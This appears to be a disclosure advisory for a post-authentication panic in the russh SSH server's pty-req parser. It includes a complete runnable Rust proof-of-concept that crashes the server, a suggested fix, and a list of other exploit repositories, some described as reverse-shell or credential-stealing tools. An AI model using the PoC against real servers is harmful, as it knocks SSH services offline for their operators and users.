## Summary A post-authentication denial-of-service panic in `russh` 0.62.2 (commit `c4be19f1915c8682f4615c3fd50008512b474491`, current default branch `main` as of 2026-07-22). An authenticated client sends a `pty-req` channel request carrying more than 130 terminal-mode records. The parser uses a fixed `[(Pty::TTY_OP_END, 0); 130]` array but increments its counter `i` for every valid record (logging "too many pty codes" without returning), then slices `&modes[0..i]` — an out-of-bounds slice that **panics** (`range end index 131 out of range for slice of length 130`) before the application `pty_request` handler runs. This is reachable with the **default** server configuration and the **default** crypto config (curve25519-sha256 + chacha20-poly1305), requiring only an authenticated session channel — no caller-supplied parameter. It is reproduced end-to-end against the unmodified real russh 0.62.2 library (a real `russh::client` + `russh::server` over TCP, using the public `Channel::request_pty(...)` API); the PoC below links the real crate, not a copied snippet. The defect is still present on `main` HEAD (`v0.62.3`, 2026-07-22) and is not covered by any of the 11 published russh GHSA advisories (GHSA-4r3c-5hpg-58qr / CVE-2026-48110 is allocation-first string parsing, not the fixed-array slice overflow; it was fixed in 0.61.0 but this code path still overflows the fixed array). Rust bounds-checked panics abort the task safely (no memory corruption / RCE); the impact is remote **denial of service**. ## Details `russh/src/server/encrypted.rs`, `pty-req` handling (lines 1137–1201): ```rust let mut modes = [(Pty::TTY_OP_END, 0); 130]; // fixed 130-entry array (line 1137) let mut i = 0; ... while !mode_bytes.is_empty() { let code = mode_bytes[0]; if code == 0 { if mode_bytes.len() != 1 { return Err(...); } break; } if mode_bytes.len() < 5 { return Err(...); } let num = BigEndian::read_u32(&mode_bytes[1..5]); if let Some(code) = Pty::from_u8(code) { if i < 130 { modes[i] = (code, num); } else { error!("pty-req: too many pty codes"); // logs, does NOT return (line 1162) } } i += 1; // keeps growing past 130 mode_bytes = &mode_bytes[5..]; } ... handler.pty_request(channel_num, &term, ..., &modes[0..i], self).await // line 1201 — OOB when i > 130 ``` Each terminal-mode record is exactly 5 bytes (1-byte opcode + 4-byte value), and `i += 1` runs for **every** valid record (including repeats of the same opcode). The `if i < 130` write-gate prevents an in-array overflow but the counter still grows unbounded, and the later `&modes[0..i]` slice has no corresponding bound. SSH packet-size limits do not bound the mode count to 130, so a single normal-sized `pty-req` can carry hundreds of mode records. The client's own `request_pty` serialization (`russh/src/client/session.rs`: ```rust ((1 + 5 * terminal_modes.len()) as u32).encode(&mut enc.write)?; // line 129 for &(code, value) in terminal_modes { if code == Pty::TTY_OP_END { continue; } (code as u8).encode(&mut enc.write)?; value.encode(&mut enc.write)?; // line 135 } ``` writes every record with no count cap, so 131 records reach the server as a legitimate authenticated channel request. ## PoC The PoC is a standalone `examples/` binary that links the **unmodified** real russh 0.62.2 crate and reproduces over a real TCP connection with the default crypto config. It runs an ATTACK case (131 mode records → panic) and a CONTROL case (130 mode records → parses fine), proving the panic is caused specifically by exceeding the 130-entry array. ### One-line reproducer ```bash # Drop the .rs below into russh/examples/ of a checkout of # Eugeny/russh @ c4be19f1915c (tag v0.62.2), then: cargo +stable build --release --example e2e_c15_pty_modes_panic RUST_BACKTRACE=1 ./target/release/examples/e2e_c15_pty_modes_panic ``` ### `russh/examples/e2e_c15_pty_modes_panic.rs` ```rust // End-to-end PoC: an authenticated pty-req with more than 130 terminal-mode // records panics the russh server in its pty-req parser. // // A real `russh::client` + `russh::server` with the DEFAULT crypto config // (curve25519-sha256 + chacha20-poly1305). The client authenticates (auth_none), // opens a session channel, and calls the public Channel::request_pty(...) API // with 131 (ATTACK) and 130 (CONTROL) terminal-mode records. The server // panics in its pty-req parser (&modes[0..i] OOB) on 131, parses fine on 130. use std::sync::atomic::{AtomicBool, Ordering}; use std::sync::{Arc, Mutex}; use russh::keys::Algorithm; use russh::server::{self, Auth, ChannelOpenHandle, Handler, Msg, Session}; use russh::{Channel, ChannelId, Pty}; use tokio::net::TcpListener; #[tokio::main] async fn main() { println!("=== russh pty-req mode overflow panic (real russh 0.62.2, default crypto) ===\n"); let (atk_panic, atk_handler) = run_case(131, "ATTACK ").await; // expect panic println!(); let (ctl_panic, ctl_handler) = run_case(130, "CONTROL").await; // expect ok println!("\n=== summary ==="); println!("case | server panicked | pty_request handler ran"); println!("ATTACK | {atk_panic:<15} | {atk_handler} (131 mode records)"); println!("CONTROL | {ctl_panic:<15} | {ctl_handler} (130 mode records)"); if atk_panic && !atk_handler && !ctl_panic && ctl_handler { println!("\n=> CONFIRMED (end-to-end, real russh 0.62.2):"); println!(" A single authenticated SSH_MSG_CHANNEL_REQUEST `pty-req`"); println!(" carrying 131 valid terminal-mode records makes the real"); println!(" russh server panic in its pty-req parser"); println!(" (range end index 131 out of range for slice of length 130)"); println!(" before the application pty_request handler runs."); } else { eprintln!("NOT reproduced"); std::process::exit(1); } } async fn run_case(num_modes: usize, label: &'static str) -> (bool, bool) { let panicked = Arc::new(AtomicBool::new(false)); { let flag = panicked.clone(); let prev = std::panic::take_hook(); std::panic::set_hook(Box::new(move |info| { flag.store(true, Ordering::SeqCst); eprintln!("[{label} server task panicked] {info}"); prev(info); })); } let events: Arc<Mutex<Vec<&'static str>>> = Arc::new(Mutex::new(Vec::new())); // real russh server, DEFAULT crypto config (curve25519 + chacha20) let mut config = server::Config::default(); config.inactivity_timeout = None; config.auth_rejection_time = std::time::Duration::from_millis(1); config.auth_rejection_time_initial = Some(std::time::Duration::from_millis(1)); config.keys.push(russh::keys::PrivateKey::random(&mut rand::rng(), Algorithm::Ed25519).unwrap()); let config = Arc::new(config); let listener = TcpListener::bind("127.0.0.1:0").await.unwrap(); let addr = listener.local_addr().unwrap(); let server_events = events.clone(); let server_task = tokio::spawn(async move { let (socket, _peer) = listener.accept().await.unwrap(); let handler = PtyServer { events: server_events }; let session = server::run_stream(config, socket, handler).await.unwrap(); session.await }); // real russh client (default config: real ECDH + encryption + auth) let client_config = Arc::new(russh::client::Config::default()); let mut session = russh::client::connect(client_config, addr, AcceptAllClient {}).await.unwrap(); let auth = session.authenticate_none("attacker").await.unwrap(); assert!(auth.success(), "[{label}] auth_none did not succeed"); let channel = session.channel_open_session().await.unwrap(); println!("[{label}] authenticated + opened session channel"); // terminal_modes: num_modes records of (VINTR, 42). The client serializes // all of them with no count cap (client/session.rs:129-137). let modes: Vec<(Pty, u32)> = vec![(Pty::VINTR, 42u32); num_modes]; let want_reply = true; let pty_result = tokio::time::timeout( std::time::Duration::from_secs(3), channel.request_pty(want_reply, "xterm", 80, 24, 0, 0, &modes), ).await; println!("[{label}] client request_pty({num_modes} modes) -> {pty_result:?}"); let _ = tokio::time::timeout(std::time::Duration::from_secs(1), server_task).await; let server_panicked = panicked.load(Ordering::SeqCst); let handler_ran = events.lock().unwrap().contains(&"pty_request"); println!("[{label}] server task panicked = {server_panicked}, pty_request handler ran = {handler_ran}"); let _ = std::panic::take_hook(); (server_panicked, handler_ran) } #[derive(Clone)] struct PtyServer { events: Arc<Mutex<Vec<&'static str>>> } impl PtyServer { fn record(&self, e: &'static str) { self.events.lock().unwrap().push(e); } } impl Handler for PtyServer { type Error = russh::Error; async fn auth_none(&mut self, _user: &str) -> Result<Auth, Self::Error> { Ok(Auth::Accept) } async fn channel_open_session( &mut self, _channel: Channel<Msg>, reply: ChannelOpenHandle, _session: &mut Session, ) -> Result<(), Self::Error> { reply.accept().await; Ok(()) } async fn pty_request( &mut self, _channel: ChannelId, _term: &str, _col_width: u32, _row_height: u32, _pix_width: u32, _pix_height: u32, _modes: &[(Pty, u32)], _session: &mut Session, ) -> Result<(), Self::Error> { self.record("pty_request"); Ok(()) } } #[derive(Clone)] struct AcceptAllClient {} impl russh::client::Handler for AcceptAllClient { type Error = russh::Error; async fn check_server_key( &mut self, _server_public_key: &russh::keys::PublicKey, ) -> Result<bool, Self::Error> { Ok(true) } } ``` Real captured output (ATTACK, `RUST_BACKTRACE=1`): ``` [ATTACK ] client request_pty(131 modes) -> Ok(Ok(())) [ATTACK server task panicked] panicked at russh/src/server/encrypted.rs:1201:39: range end index 131 out of range for slice of length 130 thread 'tokio-rt-worker' panicked at russh/src/server/encrypted.rs:1201:39 stack backtrace: 3: <Session>::server_read_authenticated::<PtyServer> 4: <Session>::process_packet::<PtyServer> 5: russh::server::reply::<PtyServer> [ATTACK ] server task panicked = true, pty_request handler ran = false [CONTROL] server task panicked = false, pty_request handler ran = true => CONFIRMED (end-to-end, real russh 0.62.2) ``` The panic occurs in russh's own post-auth parser before any application handler is invoked. ## Impact **Remote, post-authentication denial of service of any russh SSH server using the default configuration.** Any authenticated client with a session channel can crash the russh server task with a single `SSH_MSG_CHANNEL_REQUEST` `pty-req` carrying 131+ terminal-mode records (each record is 5 bytes, so 131 records fit in one normal-sized packet). This is trivially reachable for any legitimate or compromised SSH user. DoS only — Rust bounds-checked panics abort the task safely; there is no memory corruption or RCE. ### Suggested fix Cap `i` at 130 and reject the request instead of logging and continuing: ```rust if i >= 130 { return Err(Error::Inconsistent.into()); // reject instead of logging+continuing } modes[i] = (code, num); ``` ### Affected versions - `russh` **<= 0.62.3** (commit `c4be19f1915c` / current `main` HEAD `v0.62.3`, 2026-07-22). The bug is still present on `main`; it is not covered by any of the 11 published russh GHSA advisories. Default `server::Config` and `client::Config` are affected (no feature flag or opt-in). ## Credit Reported by the diff/ambidiff security research effort (afldl). Happy to coordinate a disclosure timeline; will request a CVE once confirmed.
PoC: CVE-2026-38192
pluck-CMS-4.7.20-code-injection-vulnerability
PoC: CVE-2026-82592
D-Link DIR-825M formDiskFormat stack overflow + command injection RCE PoC (CVE-2026-82592); for authorized security testing
PoC: My-Exploits
Metasploit modules, Python PoCs and throwaway Docker labs for four platform CVEs: Keycloak (CVE-2026-18963), Apache NiFi (CVE-2026-39816), HashiCorp Vault (CVE-2026-5006), HashiCorp Nomad (CVE-2026-7474).
PoC: CVE-2025-66478-PoC-Reverse-Shell
CVE-2025-66478 PoC
PoC: cve-writeups-and-pocs
CVE-2026-80724 PoC + full write-up — Linux kernel ptp/vmclock read-only mapping becomes writable (VM_MAYWRITE). Discovered, reported & fixed by Abdifatah Suruur (suruurism)
PoC: CVE-2026-79483-FastGPT-NoSQL-Injection
FastGPT Community Edition NoSQL Injection PoC (CVE-2026-79483)
PoC: givewp-cve-2026-82222-rce-lab
Authorized Docker lab and clean PoC for validating CVE-2026-82222 RCE in GiveWP 4.16.5.1 and the 4.16.7.2 fix.
PoC: CVE-2026-19745
Learn how I found my first two CVEs by pure accident.
PoC: cve-2026-23989-opencloud-lab
Reproduction lab (A/B Docker) for CVE-2026-23989 — OpenCloud / ownCloud Infinite Scale public-link scope-validation bypass in Reva
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: PoC-and-yara-rules-of-CVE-2025-59528-Flowise-has-Remote-Code-Execution-vulnerability
poc and yara rules
PoC: ActiveMQ-CVE-2023-46604
Exploit POC for Apache ActiveMQ CVE-2023-46604
PoC: gha-lab-0ba60e6456
Authorized security-research lab reproducing CVE-2024-39700 / GHSA-45gq-v5wm-82wg (JupyterLab extension-template update-integration-tests pwn request)
PoC: CVE-2026-36130
CVE-2026-36130
PoC: CVE-2026-31321
CVE-2026-31321
PoC: postgresql-cve-2026-14662
PostgreSQL の全文検索(tsvector/tsquery)に見つかった範囲外書き込み脆弱性 CVE-2026-14662 を、修正前(18.4)と修正後(18.6)を Docker で並べて動かして検証した記録と発表資料
PoC: CVE-2026-27472-and-CVE-2026-27474
PoC for CVE-2026-27472 and CVE-2026-27474
PoC: CVE-2026-27475
PoC for CVE-2026-27475
PoC: CVE-2026-18963
Unauthenticated account takeover via reset-credentials flow bypass
PoC: CVE-2026-0768
CVE-2026-0768 - Draft or TODO
PoC: CVE-2026-82329
CVE-2026-82329 - Draft or TODO
PoC: tomcat-line-check
CVE-2026-24880: does Apache's upgrade advice actually apply to your Tomcat? Detects the fix by class presence, not version comparison. Covers 7.0/8.0/8.5/9.0/10.0/10.1/11.0 lines.
PoC: log4j2-vuln-lab
CVE-2021-44228 (Log4Shell) 漏洞复现靶场 | SpringBoot + Log4j2 2.14.1 | 3 个攻击向量 PoC 验证
PoC: CVE-2021-3493-Exploit
It's a CVE-2021-3493 Exploit written in C
PoC: gha-lab-8e9316151c
Controlled security-research lab reproducing CVE-2024-1540 (GitHub Actions command injection in gradio-app/gradio deploy+test-visual.yml) — flattened snapshot of gradio-app/gradio @ f35f615e33a5dd90bfeb106b6f5dca689849fcef
PoC: gha-lab-6255f5fc33
Security-research lab reproducing CVE-2023-6572 (GHSA-gqvf-3hgp-5hxv): command injection in gradio-app/gradio's workflow_run handling of generate-changeset.yml
PoC: nextcloud-cve-2023-49792-research
A project analysis of CVE-2023-49792, inspired by a HackerOne report I have recently come across.
PoC: CVE-2026-30252
The ZenShare Suite application is vulnerable by a Reflected Cross-Site Scripting (XSS) vulnerability, affecting web application login and recovery password functionalities.
PoC: CVE-2026-30251
A reflected cross-site scripting (XSS) vulnerability in the login_newpwd.php endpoint of Interzen Consulting S.r.l ZenShare Suite v17.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via a crafted URL injected into the codice_azienda parameter.
PoC: gha-lab-fb32aba4a3
Authorized lab reproduction of CVE-2023-26493 (GHSL-2023-027): command injection via github.head_ref in cocos-engine's <Web> Interface check pull_request_target workflow
PoC: CVE-2018-14667_Lab_POC
Demonstration of the expression language (EL) injection vulnerability CVE-2018-14667 using the photoalbum lab under Jboss application server
PoC: weakrng-sweep
Weak-RNG stream-sweep research (CVE-2026-71851 class): PRNG schemes x seeds -> BIP39 -> victim set membership
PoC: cve-2022-29117-assessment
CVE-2022-29117 (.NET Cookie-Handling DoS) Assessment, Understanding & Questions Framework
PoC: POC-CVE-2026-0073
Security research PoC for CVE-2026-0073: ADB authentication bypass verification
PoC: gha-lab-232af4821f
Security-research lab reproducing CVE-2021-4281 (GHSA-3796-3f93-cfvx): shell command injection via PR head-branch name in .github/workflows/combine-prs.yml (snapshot of BraveUX/for-the-badge @ 409c1fda). Do not use; authorized reproduction only.
PoC: CVE-2026-82222
GiveWP <= 4.16.7.1 Unauthenticated PHP Object Injection → RCE
PoC: CVE-2026-76569
Reflected XSS via search GET Parameter in Phoca Download
PoC: activemq-cve-lab
ActiveMQ CVE-2015-5254 模拟靶场 - 用于 CVE 测试评测和 SCA 扫描演示
PoC: ghostlock-x200-app
vivo X200 设备端一键 root App(Shizuku 授权 shell 域执行,CVE-2026-43499)
PoC: gha-lab-b9842b12c0
Authorized security-research lab reproducing CVE-2021-21423 (GHSA-gg2g-m5wc-vccq): projen rebuild-bot pwn request via issue_comment
PoC: gha-lab-e4a85583c3
Security-research lab reproducing CVE-2020-36762 (GHSA-h9gr-83jq-f3xc): bash command injection via github.event.comment.body in the comment workflow of ONSdigital/ras-collection-instrument
PoC: Root-My-Galaxy
KSU installer for supported Samsung Galaxy firmware with CVE-2026-43499
PoC: CVE-2026-78905-Facebook-Account-Takeover
Social Media Infrastructure Vulnerability Research. CVE-2026-78905: OAuth token reuse and session hijacking in Facebook's Graph API.
PoC: CVE-2026-78904-Digital-Dinar-Drain
CBDC Infrastructure Vulnerability Research. CVE-2026-78904: Infinite mint and redemption bypass in central bank digital currency APIs.
PoC: CVE-2026-78903-SWIFT-Kick-to-the-Creds
Offensive Research & Exploit Development. Vulnerability research, PoC development, and offensive tooling for financial infrastructure.
PoC: CVE-2026-60004-Gitea-RCE-PoC
🫖 Direct single-target Gitea CVE-2026-60004 RCE validation PoC
PoC: CVE-2026-60004-Gitea-Validator
🫖 Contract-correlated discovery and authorized validation tool for Gitea CVE-2026-60004
PoC: cve-2026-67363-67364
Balboa form Command Injection POC
PoC: Simulation-d-attaque-BlueBorne-sur-v-hicule-connect-
Simulation complète d'une attaque Bluetooth (CVE-2017-1000251) sur un véhicule autonome via CARLA Simulator ; exploitation de la vulnérabilité BlueBorne pour accéder au bus CAN et déclencher un freinage brutal, en environnement isolé (Kali Linux VM / VMware / Python).
PoC: CVE-2026-76581-Detector
Safe passive detector for identifying WPMU DEV Dashboard versions affected by CVE-2026-76581.
PoC: htb-machine-ringdown
Detailed design & exploitation writeup for Ringdown—an original Debian/Asterisk vulnerable machine featuring CVE-2024-42365 (AMI), PJSIP pre-hash cracking, and Fail2ban POSIX ACL privilege escalation.
PoC: gha-lab-83342297e0
Authorized security-research lab reproducing CVE-2024-41127 (GHSA-wcjf-5464-4wq9): poisoned pipeline execution via artifact-controlled code injection in ci-failure-comment.yml. Snapshot of monkeytypegame/monkeytype @ deeea0f.
PoC: WP2Shell-Scanner
Read-only CLI to check whether a WordPress site is exposed to WP2Shell (CVE-2026-63030 / CVE-2026-60137)
PoC: phpBB-CVE-2026-48611
Automated PoC for CVE-2026-48611 — phpBB OAuth login_link authentication bypass
PoC: Project-CVE-2026-45833
CVE-2026-45833 ChromaDB
PoC: CitrixBleedCVE-2026-8452-2025-5777
CitrixBleed Exploit Tool - CVE-2025-5777 & CVE-2026-8452. Unauthenticated remote memory read from Citrix NetScaler ADC & Gateway. Steal admin session tokens, extract nsroot hashes, dump secrets, and bypass MFA. Python 3 exploit with full memory parsing.
PoC: CVE-2026-76581
CVE-2026-76581
PoC: drupalgeddon2-cve-lab
Drupalgeddon2 CVE-2018-7600 vulnerable Drupal 7 lab
PoC: shellshock-cve-lab
Shellshock CVE-2014-6271 vulnerable CGI lab
PoC: log4shell-cve-lab
Log4Shell CVE-2021-44228 vulnerable lab
PoC: CVE-2026-18741
PoC CVE-2026-18741
PoC: CVE-2026-12513
CVE-2026-12513 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK).
PoC: ghostlock-oppo-watch3pro
CVE-2026-43499 on OPPO Watch 3 Pro
PoC: cve-2026-82222-poc
Public PoC for CVE-2026-82222
PoC: zk-xml-probe
Static XML fixtures for authorized bug bounty testing of XML parser behaviour (CVE-2026-45071).
PoC: SOC335-CVE-2024-49138-Investigation
SOC investigation of a CVE-2024-49138 exploitation alert using log analysis, threat intelligence, and endpoint containment.
PoC: papercut-toolkit
#PaperCut CVE-2026-81578 + CVE-2026-82078 Defense Toolkit 2 3 A **defensive** toolkit to check and understand exposure to the chained
PoC: PaperCut-CVE-2026-81578-82078
Security research tool for PaperCut CVE-2026-81578 & CVE-2026-82078
PoC: vankyo-s30-bootloader-unlock
Vankyo MatrixPad S30 (Unisoc SC9863A) — Bootloader unlock via CVE-2022-38694 FDL1 method
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: hdwebmobile-formula-pricing
WooCommerce plugin: safe formula-based product pricing, closing CVE-2026-4001's eval()-based RCE
PoC: CVE-2026-82286-gpt-crawler-Arbitrary-File-Write
CVE-2026-82286 — gpt-crawler <=1.5.1 unauthenticated arbitrary file write via outputFileName (POST /crawl). PoC + self-contained Docker lab. CVSS 8.6, CWE-22.
PoC: CVE-2026-24061-payload
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
PoC: CVE-2026-66384
CVE-2026-66384 - Draft or TODO
PoC: CVE-2026-33017-PoC-Reverse-Shell
CVE-2026-33017 PoC Reverse Shell
PoC: CVE-2026-33057---Mesop-Unauthenticated-RCE-PoC-and-yara-rules
CVE-2026-33057 - Mesop Unauthenticated RCE PoC and yara rules
PoC: CVE-2026-10036-speechbrain-rce
SpeechBrain < 1.1.1 checkpoint metadata RCE via unsafe PyYAML parsing of CKPT.yaml.
PoC: CVE-2025-55182-poc
I know you are probably here from Hack the Box, if so, yes this one actually works.
PoC: Project-CVE-2026-50751
IKEv1 VPN scanners, attempts a Check Point authentication-bypass exploit, and includes internal network scanning and reverse-shell features.
PoC: CTT-Enhanced-CVE-2026-46339-Exploit-Engine
A specialized Python framework that executes unauthenticated remote code execution via the 9Router Model Context Protocol (MCP) bridge by deploying a 33-layer temporal phase cascade, Riemann-Hadamard dispersion, and an 11 ns wedge filter to bypass traditional proxy and process-monitoring defenses.
PoC: Zimbra-CVE-2026-73570-Rules
Wazuh Rules for Detection Zimbra (CVE-2026-73570).
PoC: CVE-2022-46169
Cacti 1.2.22 unauthenticated command injection
PoC: CVE-2024-23897
Jenkins CVE-2024-23897 — CSRF-crumb aware PoC
PoC: CVE-2025-10952-ml-logger-AFR
PoC for CVE-2025-10952 — ml-logger unauthenticated arbitrary file read. CVSS 5.3
PoC: CVE-2026-65643
CVE-2026-65643 - Draft or TODO
PoC: cve-2023-23397-detection-lab
Detection and mitigation research lab for CVE-2023-23397 using network and endpoint security telemetry.
PoC: fastjson-cve
fastjson-cve-2026-16723
PoC: CVE-2026-23751-poc
Patched RemotingClient to exploit CVE-2026-23751 (Tungsten Automation - Kofax Capture Unauthenticated File Read/Write and SMB coercion via .NET HTTP Remoting)
PoC: CVE-2023-27350-CVE-2023-27351
CVE-2023-27350, CVE-2023-27351 - PaperCut - Draft or TODO
PoC: Project-CVE-2026-33017
CVE-2026-33017 - Langflow Unauthenticated RCE Exploit
PoC: CVE-2026-70463
Testing CVE-2026-70463 by Fyyre
PoC: 2025-Oracle-SSO-LDAP-Attack-Post-Incident-Written-Report
Post-incident report analyzing the Oracle Cloud SSO/LDAP supply chain attack (CVE-2021-35587). Details the exploitation of legacy server infrastructure, impact across 140,000+ cloud tenants, root-cause findings, and phased mitigation strategies.
PoC: CVE-2026-20131-Post-Incident-Written-Report
Post-incident report on CVE-2026-20131 (CVSS 10.0), a Cisco FMC insecure deserialization vulnerability exploited by Interlock ransomware. Details root-cause analysis, lateral movement tactics, and emergency containment strategies.
PoC: ghostlock-pfem10
GhostLock (CVE-2026-43499 / IonStack) research for OPPO Find X5 Pro (PFEM10): exploit chain, progress, blocker log, and OPPO 5-series kernel notes
PoC: htb-labs-connected
Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege escalation to root via FreePBX and incron.
PoC: spring-ai-sibling-loop-poc
Minimal reproduction for Spring AI ParagraphManager sibling self-loop OOM (incomplete fix of CVE-2026-47851)
PoC: mssharepoint-scanner
A scanner for CVE-2026-55040 and CVE-2026-63520, designed to determine whether the server is affected by these two CVEs.
PoC: weblogic
Oracle WebLogic Console unauthenticated auth bypass + RCE exploit (CVE-2020-14882 / CVE-2020-14750)
PoC: CVE-2021-27876-veritas-backup
Metasploit module: Veritas Backup Exec Agent SHA-auth NDMP remote code execution (CVE-2021-27876/27877/27878)
PoC: Project-CVE-2026-65351
For educational purposes
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
Get alerted for CVEs like this
Register your stack and get notified within minutes when a matching CVE drops.
Start monitoring free